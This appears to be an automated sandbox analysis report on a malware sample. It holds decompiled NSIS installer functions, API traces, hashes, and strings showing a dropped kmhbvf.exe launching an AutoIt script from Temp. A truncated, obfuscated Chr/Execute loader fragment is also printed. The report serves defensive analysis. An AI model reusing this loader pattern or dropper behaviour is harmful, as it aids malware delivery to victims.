                                                                  0x00401863
                                                                  0x00401871
                                                                  0x00401876
                                                                  0x0040187c
                                                                  0x00401880
                                                                  0x00401882
                                                                  0x0040188a
                                                                  0x00401896
                                                                  0x00401884
                                                                  0x00401884
                                                                  0x00401888
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401888
                                                                  0x0040189f
                                                                  0x004018a5
                                                                  0x004018a7
                                                                  0x00000000
                                                                  0x004018ad
                                                                  0x004018ad
                                                                  0x004018b0
                                                                  0x004018c8
                                                                  0x004018b2
                                                                  0x004018b5
                                                                  0x004018be
                                                                  0x004018be
                                                                  0x004018cd
                                                                  0x004018d2
                                                                  0x0040221f
                                                                  0x00000000
                                                                  0x0040221f
                                                                  0x00000000

                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3",C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3","C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3",00000000,00000000,"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3",C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                    • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3"$C:\Users\user\AppData\Local\Temp
                                                                  • API String ID: 1941528284-416042440
                                                                  • Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                                  • Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
                                                                  • Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                                  • Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 415 402f2e-402f3d 416 402f5b-402f66 call 403059 415->416 417 402f3f-402f55 SetFilePointer 415->417 420 403052-403056 416->420 421 402f6c-402f86 ReadFile 416->421 417->416 422 402f8c-402f8f 421->422 423 40304f 421->423 422->423 424 402f95-402fa8 call 403059 422->424 425 403051 423->425 424->420 428 402fae-402fb1 424->428 425->420 429 402fb3-402fb6 428->429 430 40301e-403024 428->430 433 40304a-40304d 429->433 434 402fbc 429->434 431 403026 430->431 432 403029-40303c ReadFile 430->432 431->432 432->423 435 40303e-403047 432->435 433->420 436 402fc1-402fc9 434->436 435->433 437 402fcb 436->437 438 402fce-402fe0 ReadFile 436->438 437->438 438->423 439 402fe2-402fe5 438->439 439->423 440 402fe7-402ffc WriteFile 439->440 441 40301a-40301c 440->441 442 402ffe-403001 440->442 441->425 442->441 443 403003-403016 442->443 443->436 444 403018 443->444 444->433
                                                                  C-Code - Quality: 93%
                                                                  			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                                                                  				long _v8;
                                                                  				intOrPtr _v12;
                                                                  				void _t31;
                                                                  				intOrPtr _t32;
                                                                  				int _t35;
                                                                  				long _t36;
                                                                  				int _t37;
                                                                  				long _t38;
                                                                  				int _t40;
                                                                  				int _t42;
                                                                  				long _t43;
                                                                  				long _t44;
                                                                  				long _t55;
                                                                  				long _t57;
                                                                  
                                                                  				_t31 = _a4;
                                                                  				if(_t31 >= 0) {
                                                                  					_t44 = _t31 +  *0x423fd8;
                                                                  					 *0x417124 = _t44;
                                                                  					SetFilePointer( *0x409018, _t44, 0, 0); // executed
                                                                  				}
                                                                  				_t57 = 4;
                                                                  				_t32 = E00403059(_t57);
                                                                  				if(_t32 >= 0) {
                                                                  					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
                                                                  					if(_t35 == 0 || _v8 != _t57) {
                                                                  						L23:
                                                                  						_push(0xfffffffd);
                                                                  						goto L24;
                                                                  					} else {
                                                                  						 *0x417124 =  *0x417124 + _t57;
                                                                  						_t32 = E00403059(_a4);
                                                                  						_v12 = _t32;
                                                                  						if(_t32 >= 0) {
                                                                  							if(_a12 != 0) {
                                                                  								_t36 = _a4;
                                                                  								if(_t36 >= _a16) {
                                                                  									_t36 = _a16;
                                                                  								}
                                                                  								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
                                                                  								if(_t37 == 0) {
                                                                  									goto L23;
                                                                  								} else {
                                                                  									_t38 = _v8;
                                                                  									 *0x417124 =  *0x417124 + _t38;
                                                                  									_v12 = _t38;
                                                                  									goto L22;
                                                                  								}
                                                                  							} else {
                                                                  								if(_a4 <= 0) {
                                                                  									L22:
                                                                  									_t32 = _v12;
                                                                  								} else {
                                                                  									while(1) {
                                                                  										_t55 = 0x4000;
                                                                  										if(_a4 < 0x4000) {
                                                                  											_t55 = _a4;
                                                                  										}
                                                                  										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
                                                                  										if(_t40 == 0 || _t55 != _v8) {
                                                                  											goto L23;
                                                                  										}
                                                                  										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
                                                                  										if(_t42 == 0 || _a16 != _t55) {
                                                                  											_push(0xfffffffe);
                                                                  											L24:
                                                                  											_pop(_t32);
                                                                  										} else {
                                                                  											_t43 = _v8;
                                                                  											_v12 = _v12 + _t43;
                                                                  											_a4 = _a4 - _t43;
                                                                  											 *0x417124 =  *0x417124 + _t43;
                                                                  											if(_a4 > 0) {
                                                                  												continue;
                                                                  											} else {
                                                                  												goto L22;
                                                                  											}
                                                                  										}
                                                                  										goto L25;
                                                                  									}
                                                                  									goto L23;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				L25:
                                                                  				return _t32;
                                                                  			}

















                                                                  0x00402f33
                                                                  0x00402f3d
                                                                  0x00402f46
                                                                  0x00402f4a
                                                                  0x00402f55
                                                                  0x00402f55
                                                                  0x00402f5d
                                                                  0x00402f5f
                                                                  0x00402f66
                                                                  0x00402f82
                                                                  0x00402f86
                                                                  0x0040304f
                                                                  0x0040304f
                                                                  0x00000000
                                                                  0x00402f95
                                                                  0x00402f98
                                                                  0x00402f9e
                                                                  0x00402fa5
                                                                  0x00402fa8
                                                                  0x00402fb1
                                                                  0x0040301e
                                                                  0x00403024
                                                                  0x00403026
                                                                  0x00403026
                                                                  0x00403038
                                                                  0x0040303c
                                                                  0x00000000
                                                                  0x0040303e
                                                                  0x0040303e
                                                                  0x00403041
                                                                  0x00403047
                                                                  0x00000000
                                                                  0x00403047
                                                                  0x00402fb3
                                                                  0x00402fb6
                                                                  0x0040304a
                                                                  0x0040304a
                                                                  0x00402fbc
                                                                  0x00402fc1
                                                                  0x00402fc1
                                                                  0x00402fc9
                                                                  0x00402fcb
                                                                  0x00402fcb
                                                                  0x00402fdc
                                                                  0x00402fe0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402ff4
                                                                  0x00402ffc
                                                                  0x0040301a
                                                                  0x00403051
                                                                  0x00403051
                                                                  0x00403003
                                                                  0x00403003
                                                                  0x00403006
                                                                  0x00403009
                                                                  0x0040300c
                                                                  0x00403016
                                                                  0x00000000
                                                                  0x00403018
                                                                  0x00000000
                                                                  0x00403018
                                                                  0x00403016
                                                                  0x00000000
                                                                  0x00402ffc
                                                                  0x00000000
                                                                  0x00402fc1
                                                                  0x00402fb6
                                                                  0x00402fb1
                                                                  0x00402fa8
                                                                  0x00402f86
                                                                  0x00403052
                                                                  0x00403056

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
                                                                  • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
                                                                  • ReadFile.KERNELBASE(Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
                                                                  • WriteFile.KERNELBASE(00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4
                                                                  Strings
                                                                  • Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 00402FBC, 00402FD5, 00402FF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$PointerWrite
                                                                  • String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
                                                                  • API String ID: 2113905535-3096212848
                                                                  • Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                                  • Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
                                                                  • Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                                  • Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 445 403059-403082 GetTickCount 446 4031c3-4031cb call 402be9 445->446 447 403088-4030b3 call 403207 SetFilePointer 445->447 452 4031cd-4031d2 446->452 453 4030b8-4030ca 447->453 454 4030cc 453->454 455 4030ce-4030dc call 4031d5 453->455 454->455 458 4030e2-4030ee 455->458 459 4031b5-4031b8 455->459 460 4030f4-4030fa 458->460 459->452 461 403125-403141 call 406184 460->461 462 4030fc-403102 460->462 468 403143-40314b 461->468 469 4031be 461->469 462->461 463 403104-403124 call 402be9 462->463 463->461 471 40314d-403163 WriteFile 468->471 472 40317f-403185 468->472 470 4031c0-4031c1 469->470 470->452 473 403165-403169 471->473 474 4031ba-4031bc 471->474 472->469 475 403187-403189 472->475 473->474 476 40316b-403177 473->476 474->470 475->469 477 40318b-40319e 475->477 476->460 478 40317d 476->478 477->453 479 4031a4-4031b3 SetFilePointer 477->479 478->477 479->446
                                                                  C-Code - Quality: 94%
                                                                  			E00403059(intOrPtr _a4) {
                                                                  				long _v4;
                                                                  				void* __ecx;
                                                                  				intOrPtr _t12;
                                                                  				intOrPtr _t13;
                                                                  				signed int _t14;
                                                                  				void* _t16;
                                                                  				void* _t17;
                                                                  				long _t18;
                                                                  				int _t21;
                                                                  				intOrPtr _t34;
                                                                  				long _t35;
                                                                  				intOrPtr _t37;
                                                                  				void* _t39;
                                                                  				long _t40;
                                                                  				intOrPtr _t53;
                                                                  
                                                                  				_t35 =  *0x417124; // 0x11b837
                                                                  				_t37 = _t35 -  *0x40b090 + _a4;
                                                                  				 *0x423f8c = GetTickCount() + 0x1f4;
                                                                  				if(_t37 <= 0) {
                                                                  					L23:
                                                                  					E00402BE9(1);
                                                                  					return 0;
                                                                  				}
                                                                  				E00403207( *0x41f134);
                                                                  				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
                                                                  				 *0x41f130 = _t37;
                                                                  				 *0x417120 = 0;
                                                                  				while(1) {
                                                                  					_t12 =  *0x417128; // 0xdc096
                                                                  					_t34 = 0x4000;
                                                                  					_t13 = _t12 -  *0x41f134;
                                                                  					if(_t13 <= 0x4000) {
                                                                  						_t34 = _t13;
                                                                  					}
                                                                  					_t14 = E004031D5(0x413120, _t34); // executed
                                                                  					if(_t14 == 0) {
                                                                  						break;
                                                                  					}
                                                                  					 *0x41f134 =  *0x41f134 + _t34;
                                                                  					 *0x40b0b0 = 0x413120;
                                                                  					 *0x40b0b4 = _t34;
                                                                  					L6:
                                                                  					L6:
                                                                  					if( *0x423f90 != 0 &&  *0x424020 == 0) {
                                                                  						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
                                                                  						E00402BE9(0);
                                                                  					}
                                                                  					 *0x40b0b8 = 0x40b120;
                                                                  					 *0x40b0bc = 0x8000; // executed
                                                                  					_t16 = E00406184(0x40b098); // executed
                                                                  					if(_t16 < 0) {
                                                                  						goto L21;
                                                                  					}
                                                                  					_t39 =  *0x40b0b8; // 0x411ec5
                                                                  					_t40 = _t39 - 0x40b120;
                                                                  					if(_t40 == 0) {
                                                                  						__eflags =  *0x40b0b4; // 0x0
                                                                  						if(__eflags != 0) {
                                                                  							goto L21;
                                                                  						}
                                                                  						__eflags = _t34;
                                                                  						if(_t34 == 0) {
                                                                  							goto L21;
                                                                  						}
                                                                  						L17:
                                                                  						_t18 =  *0x417124; // 0x11b837
                                                                  						if(_t18 -  *0x40b090 + _a4 > 0) {
                                                                  							continue;
                                                                  						}
                                                                  						SetFilePointer( *0x409018, _t18, 0, 0); // executed
                                                                  						goto L23;
                                                                  					}
                                                                  					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
                                                                  					if(_t21 == 0 || _t40 != _v4) {
                                                                  						_push(0xfffffffe);
                                                                  						L22:
                                                                  						_pop(_t17);
                                                                  						return _t17;
                                                                  					} else {
                                                                  						 *0x40b090 =  *0x40b090 + _t40;
                                                                  						_t53 =  *0x40b0b4; // 0x0
                                                                  						if(_t53 != 0) {
                                                                  							goto L6;
                                                                  						}
                                                                  						goto L17;
                                                                  					}
                                                                  					L21:
                                                                  					_push(0xfffffffd);
                                                                  					goto L22;
                                                                  				}
                                                                  				return _t14 | 0xffffffff;
                                                                  			}


















                                                                  0x0040305d
                                                                  0x0040306a
                                                                  0x0040307d
                                                                  0x00403082
                                                                  0x004031c3
                                                                  0x004031c5
                                                                  0x00000000
                                                                  0x004031cb
                                                                  0x0040308e
                                                                  0x004030a1
                                                                  0x004030a7
                                                                  0x004030ad
                                                                  0x004030b8
                                                                  0x004030b8
                                                                  0x004030bd
                                                                  0x004030c2
                                                                  0x004030ca
                                                                  0x004030cc
                                                                  0x004030cc
                                                                  0x004030d5
                                                                  0x004030dc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004030e2
                                                                  0x004030e8
                                                                  0x004030ee
                                                                  0x00000000
                                                                  0x004030f4
                                                                  0x004030fa
                                                                  0x0040311a
                                                                  0x0040311f
                                                                  0x00403124
                                                                  0x0040312a
                                                                  0x00403130
                                                                  0x0040313a
                                                                  0x00403141
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403143
                                                                  0x00403149
                                                                  0x0040314b
                                                                  0x0040317f
                                                                  0x00403185
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403187
                                                                  0x00403189
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040318b
                                                                  0x0040318b
                                                                  0x0040319e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004031ad
                                                                  0x00000000
                                                                  0x004031ad
                                                                  0x0040315b
                                                                  0x00403163
                                                                  0x004031ba
                                                                  0x004031c0
                                                                  0x004031c0
                                                                  0x00000000
                                                                  0x0040316b
                                                                  0x0040316b
                                                                  0x00403171
                                                                  0x00403177
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040317d
                                                                  0x004031be
                                                                  0x004031be
                                                                  0x00000000
                                                                  0x004031be
                                                                  0x00000000

                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0040306E
                                                                    • Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
                                                                  • WriteFile.KERNELBASE(0040B120,00411EC5,00000000,00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
                                                                  • SetFilePointer.KERNELBASE(0011B837,00000000,00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD
                                                                  Strings
                                                                  • Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 004030CE, 004030D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: File$Pointer$CountTickWrite
                                                                  • String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
                                                                  • API String ID: 2146148272-3096212848
                                                                  • Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                                  • Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
                                                                  • Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                                  • Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 480 4015b3-4015c6 call 402a0c call 405882 485 4015c8-4015e3 call 405819 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40217f call 401423 486->488 489 40160f-401628 call 401423 call 405cfb SetCurrentDirectoryA 486->489 501 4028a1-4028b0 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                                                                  C-Code - Quality: 85%
                                                                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                  				struct _SECURITY_ATTRIBUTES** _t10;
                                                                  				int _t19;
                                                                  				struct _SECURITY_ATTRIBUTES* _t20;
                                                                  				signed char _t22;
                                                                  				struct _SECURITY_ATTRIBUTES* _t23;
                                                                  				CHAR* _t25;
                                                                  				struct _SECURITY_ATTRIBUTES** _t29;
                                                                  				void* _t30;
                                                                  
                                                                  				_t23 = __ebx;
                                                                  				_t25 = E00402A0C(0xfffffff0);
                                                                  				_t10 = E00405882(_t25);
                                                                  				_t27 = _t10;
                                                                  				if(_t10 != __ebx) {
                                                                  					do {
                                                                  						_t29 = E00405819(_t27, 0x5c);
                                                                  						 *_t29 = _t23;
                                                                  						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                  						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                  						if(_t19 == 0) {
                                                                  							if(GetLastError() != 0xb7) {
                                                                  								L4:
                                                                  								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                  							} else {
                                                                  								_t22 = GetFileAttributesA(_t25); // executed
                                                                  								if((_t22 & 0x00000010) == 0) {
                                                                  									goto L4;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                  						 *_t29 = _t20;
                                                                  						_t27 =  &(_t29[0]);
                                                                  					} while (_t20 != _t23);
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
                                                                  					_push(0xfffffff5);
                                                                  					E00401423();
                                                                  				} else {
                                                                  					E00401423(0xffffffe6);
                                                                  					E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                                                                  					SetCurrentDirectoryA(_t25); // executed
                                                                  				}
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
                                                                  				return 0;
                                                                  			}











                                                                  0x004015b3
                                                                  0x004015ba
                                                                  0x004015bd
                                                                  0x004015c2
                                                                  0x004015c6
                                                                  0x004015c8
                                                                  0x004015d0
                                                                  0x004015d6
                                                                  0x004015d8
                                                                  0x004015db
                                                                  0x004015e3
                                                                  0x004015f0
                                                                  0x004015fd
                                                                  0x004015fd
                                                                  0x004015f2
                                                                  0x004015f3
                                                                  0x004015fb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004015fb
                                                                  0x004015f0
                                                                  0x00401600
                                                                  0x00401603
                                                                  0x00401605
                                                                  0x00401606
                                                                  0x004015c8
                                                                  0x0040160d
                                                                  0x0040162d
                                                                  0x0040217a
                                                                  0x0040160f
                                                                  0x00401611
                                                                  0x0040161c
                                                                  0x00401622
                                                                  0x00401622
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                    • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405890
                                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                                  • API String ID: 3751793516-501415292
                                                                  • Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                                  • Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
                                                                  • Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                                  • Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
